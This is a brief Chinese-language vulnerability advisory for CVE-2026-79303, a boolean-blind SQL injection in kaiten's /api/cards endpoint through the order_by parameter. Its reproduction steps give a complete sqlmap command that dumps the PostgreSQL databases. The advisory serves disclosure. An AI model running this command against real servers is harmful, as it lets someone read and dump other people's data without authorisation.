CVE-2026-79303
布尔型盲注(Boolean-blind SQL injection)
描述:动态 SQL 语句的生成未进行必要的数据验证,也未使用参数化语句或存储过程。
影响:SQL 注入(SQLi)
CVSSv3.1 向量:AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H(9.9 严重)
CWE:CWE-89:SQL 命令中特殊元素中和不当('SQL 注入')
受影响组件:GET 参数 order_by 和 order_direction
厂商:kaiten
受影响产品
- kaiten 版本:57.192.20 < 57.214.26
复现步骤:
- sqlmap -u "https://[kaiten ip]/api/cards?version=2&limit=51&query=1&order_by=1&order_direction=desc&search_fields=title" --cookie="connect.sid=[value]" -p 'order_by' --technique B --level 5 --dbms postgresql --dbs --dump
- 输入 n(不将你的 cookie 与新 cookie 合并)-> C
发现者
参考